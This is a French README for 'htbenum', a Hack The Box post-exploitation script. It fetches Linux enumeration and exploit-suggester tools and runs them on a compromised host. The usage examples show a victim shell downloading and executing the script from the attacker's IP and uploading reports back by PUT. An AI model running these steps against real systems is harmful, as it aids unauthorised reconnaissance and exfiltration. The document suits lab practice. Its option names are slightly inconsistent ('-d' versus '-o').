
Un script d'énumération Linux pour Hack The Box
Un script d'énumération Linux pour Hack The Box
Ce script est conçu pour être utilisé dans des situations où vous n'avez pas d'accès Internet sur un hôte Linux et souhaitez exécuter des scripts d'énumération et de suggestion d'exploitation, comme sur Hack The Box. Je me retrouve souvent à lancer un ensemble similaire de scripts lorsque j'obtiens un premier point d'appui sur une machine Linux, et ce script permet d'automatiser le téléchargement de la dernière version de chaque script d'énumération, de le rendre exécutable et de l'exécuter, tout en envoyant la sortie vers un fichier pour un examen ultérieur. Il dispose également d'un serveur web intégré pour héberger les outils et télécharger les rapports vers la machine hôte.
Les pull requests/suggestions sont les bienvenues !

./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]
Exemple :
Machine hôte : root@kali:~/htbenum# ./htbenum.sh -u
Machine hôte : root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
Machine victime : www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
Machine victime : www-data@victim:/tmp$ chmod +x ./htbenum.sh
Machine victime : www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
Paramètres :
-h - Afficher l'aide et l'utilisation.
-i IP - Adresse IP du serveur web d'écoute utilisé pour le téléchargement et l'envoi.
-p port - Port TCP du serveur web d'écoute utilisé pour le téléchargement et l'envoi.
-o directory - Répertoire personnalisé de téléchargement et de création de rapports (par défaut /tmp).
-w - Démarrer le serveur web intégré pour télécharger les fichiers et envoyer les rapports.
-u - Mettre à jour vers les dernières versions de chaque outil, en écrasant les versions existantes.
-r - Envoyer les rapports vers le serveur web de la machine hôte (doit supporter les requêtes PUT).
Pour utiliser htbenum, clonez le dépôt et exécutez le script avec le paramètre update sur votre machine locale. Cela téléchargera et mettra à jour tous les scripts nécessaires depuis Internet (Github) et les placera dans le même répertoire que htbenum.sh :
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum# ./htbenum.sh -u
_ _ ___________ _____ _ _ _ ____ ___
| | | |_ _| ___ \ ___| \ | | | | | \/ |
| |_| | | | | |_/ / |__ | \| | | | | . . |
| _ | | | | ___ \ __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\ | |_| | | | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_| |_/
Par Solomon Sklash - [email protected]
[i] Mise à jour de tous les outils...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Mise à jour terminée !
root@kali:~/htbenum#
Ensuite, démarrez le serveur web intégré pour héberger les outils et recevoir les rapports terminés. Le serveur nécessite Python 3. Vous pouvez utiliser votre propre serveur web pour héberger les outils, mais il devra supporter les requêtes PUT pour les téléchargements de rapports.
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
Enfin, téléchargez le script htbenum.sh sur votre machine cible, rendez-le exécutable et exécutez-le avec l'adresse IP et le port de votre machine hôte, avec un répertoire facultatif pour télécharger les fichiers et écrire la sortie des rapports. Vous pouvez également envoyer les rapports vers la machine hôte si vous le souhaitez. Par exemple :
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
Chaque outil enverra sa sortie vers un fichier de rapport dans le même répertoire que le script htbenum.sh, ou dans le répertoire spécifié par le paramètre -d.